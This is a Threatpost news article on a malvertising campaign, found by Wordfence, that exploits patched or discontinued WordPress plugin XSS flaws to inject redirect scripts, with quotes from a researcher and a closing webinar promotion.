A widespread and ongoing malicious advertising campaign is exploiting several recently-disclosed WordPress plugin vulnerabilities to redirect website visitors to booby-trapped landing pages.
Researchers at Wordfence said that they recently discovered bad actors injecting code into websites with the vulnerable plugins in order to display unwanted popup ads, as well as redirect site visitors to tech support scam pages, malicious Android APKs and sketchy pharmaceutical ads.
Attackers exploited a variety of recently-disclosed WordPress plugin, such as cross-site scripting vulnerabilities, to launch the malvertising attack.
Several other vulnerabilities disclosed over the past few months were also exploited in earlier iterations of the malvertising campaign.
That includes a vulnerability in the Yellow Pencil Visual CSS Style Editor plugin (which has 30,000 installs) disclosed and patched in April, and a flaw in the Blog Designer plugin, (which has more than 30,000 installations) that was disclosed and patched in May.
“At this time, all of the plugins with vulnerabilities they’re attempting to exploit either have patches available or have been discontinued by their developers and are unavailable for new installs,” Veenstra told Threatpost.
The injections tout a short script which sources additional code from third-party URLs, which is executed when a visitor opens the victim website.
“When the third-party code executes in a visitor’s browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user,” according to Wordfence.
The earliest confirmed activity associated with the campaign was tied to the registration of yourservice[.]live (one of the URLs being commonly sourced in the injected script on websites) in September 2018, Veenstra told Threatpost. However, he said that it didn’t necessarily mean they began an attack campaign at the same time.
“We do know they were issuing attacks at scale by April of 2019, but the attacker’s TTPs [tactics techniques and procedures] change frequently enough that the campaign may have had a much different scope before then,” he said.
Plugins continue to be a security thorn in WordPress’ side: According to a Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog. Other recent vulnerabilities found in WordPress plugins include WP Live Chat and Yuzo Related Posts.
While the total number of infected websites is unknown, Veenstra told Threatpost that it’s reasonable to expect anyone impacted by a newly disclosed XSS flaw in the near future to be at risk.
“It’s difficult to estimate an expected impact in this case,” Veenstra told Threatpost. “Some plugins they’re attacking have been removed from the official repository, which makes version install counts hard to assess, and some were never there in the first place. The attackers still probe for months-old vulnerabilities, but quickly adopt new ones as they’re disclosed.”
Interested in more on patch management? Don’t miss our free live Threatpost webinar, “Streamlining Patch Management,” on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. Register and Learn More